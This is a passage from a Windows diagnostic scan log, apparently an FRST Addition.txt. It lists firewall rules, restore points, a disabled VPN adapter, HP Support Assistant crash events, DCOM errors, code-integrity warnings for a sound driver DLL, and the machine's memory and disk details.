FirewallRules: [{01F95391-ED01-4F64-9018-B6100F39FEAF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_2\Sigmund Holiday Special 2\SigCorp Minisode 2.exe
FirewallRules: [TCP Query User{72AA06B1-F211-4A33-9E5B-BDA97F16FEC8}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{CC91630A-F57E-45BC-9C16-DA8830869D75}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{3D3FDDFC-5839-4C00-B16D-BF6AF86422A1}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7BC13CB3-B503-477D-BB1A-4817324D0E29}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{7C9DF681-98A8-4176-9F02-5AB9EEA917FB}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C60277F5-5041-4E73-BF63-84E549C3AC88}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{CC720A29-8931-48C1-8E80-649F39CB194F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{9742C07E-293C-499D-A5CF-A4F7BB7606EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{260B72E1-4C59-4FC7-A5E1-8E7980A6D4CB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{1162A9B5-A0E0-435B-A906-0015B6C17402}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{974D5DA0-1536-470E-B3CC-4DDA61DB8CF6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{CE8A303A-859B-43FF-92FE-87B1FCDD5242}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [TCP Query User{46EBF09F-525F-48F7-A97C-2B2255771C95}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0951722D-11EC-4AE5-BF45-21B90D5BD52A}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [{27939F77-18D9-4B61-8B4A-55CE4F5B1D16}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9C84E526-1D5D-41C5-98A5-836AA8D7B895}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9F6EFC5C-20F7-4240-A6F4-FAAADDC79222}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D44CFE24-34B8-4A45-BF4F-55E86AC5979F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22CD5A1C-FB0F-4FF3-9DDA-E5D4B45D980D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gun Monkeys\Gun_Monkeys.exe
FirewallRules: [{C060BB13-ED23-4D11-8E60-08B9E10BDD06}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gun Monkeys\Gun_Monkeys.exe
FirewallRules: [{7F89ED06-FFA5-4832-B5D2-E66EC2F3B4CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{B5BD51EF-44B0-488D-87AE-B81B4071E1BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{7117A913-5AED-4B50-BC2F-7DF69C08CCE5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{9971C14D-96AA-4771-B823-0152D1C82A1C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{7A073EC5-3560-4A9E-B576-F430389C8052}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{769AB8F8-1A8D-455B-9FCA-AAFE99FB723B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{2C4B7454-65B6-4F39-AC70-EF99AB8E524F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{697880E0-5C2C-4C28-BB8F-BCC38B87ED07}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{9B228ACE-74CA-40C0-AFD3-A02AECB790C0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{13D640F0-DB7C-478D-A94C-7B7133ED9252}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{97F58A83-949F-4ED4-9D5B-0DAC4E3482DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{479C317A-0E09-45AB-916C-EDE9A725D7B5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{D251FB94-1CF8-4A0A-816E-8E4DD0976927}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{CFEF7D67-A115-421C-88B1-C9608D593AA9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{1E179886-2923-4B86-B7F6-EC1A4FE3D58F}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{484535D1-A913-4A7B-AF6E-61EBB017A62A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{DF5FFCA8-6F8C-439B-995F-712D19620BAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{948FCA58-8B00-4931-A9B5-3EE57B4A5A6E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{DDA6E56A-92FA-4EF2-B766-F781DF517D5E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{231C9584-4FBD-49BC-AF86-122B2D84AC79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 3\FalloutLauncher.exe
FirewallRules: [{181A1372-B41E-4D0E-B02A-14BB04F2F224}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 3\FalloutLauncher.exe
FirewallRules: [{A4B47712-3BCB-4105-8BF3-E2064799EB3A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2E901D8E-2865-4268-A369-5EC5F867E35E}] => (Allow) C:\Users\owner\AppData\Local\BrowserAir\Application\BrowserAir.exe

==================== Restore Points =========================

25-12-2015 14:53:26 Scheduled Checkpoint
27-12-2015 17:03:55 Installed HP Support Solutions Framework
03-01-2016 21:22:49 Removed League of Legends

==================== Faulty Device Manager Devices =============

Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (01/10/2016 08:49:32 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Explorer.EXE version 6.3.9600.17667 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 7f4

Start Time: 01d14c2ac4b20d21

Termination Time: 0

Application Path: C:\WINDOWS\Explorer.EXE

Report Id: 5c1c1960-b81e-11e5-8297-68942386c715

Faulting package full name:

Faulting package-relative application ID:

Error: (01/10/2016 08:48:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0xfe8
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 08:48:56 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 04:13:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0xd58
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 04:13:47 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 03:51:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0x15dc
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 03:51:26 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 12531

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 12531

Error: (01/10/2016 03:12:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (01/10/2016 09:13:25 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WinHTTP Web Proxy Auto-Discovery Service service depends on the DHCP Client service which failed to start because of the following error:
%%1068

Error: (01/10/2016 09:12:24 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:18 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084WSearchUnavailable{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (01/10/2016 09:12:16 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:14 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084WSearchUnavailable{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (01/10/2016 09:12:10 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:12:04 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:59 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:54 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/10/2016 09:11:54 PM) (Source: DCOM) (EventID: 10005) (User: ACER)
Description: 1068netprofmUnavailable{A47979D2-C419-11D9-A5B4-001185AD2B89}


CodeIntegrity:
===================================
Date: 2016-01-09 17:17:57.014
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:39.215
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:38.978
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:38.666
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:37.837
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:20.422
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:19.605
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:18.912
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:16.937
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-09 17:17:16.370
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 16%
Total physical RAM: 8007.27 MB
Available physical RAM: 6654.75 MB
Total Virtual: 16199.27 MB
Available Virtual: 14920.64 MB

==================== Drives ================================

Drive c: (Acer) (Fixed) (Total:681.41 GB) (Free:497.65 GB) NTFS
Drive e: (Lexar) (Removable) (Total:7.46 GB) (Free:0.47 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 6B0758F4)

Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.5 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)

==================== End of Addition.txt ============================
 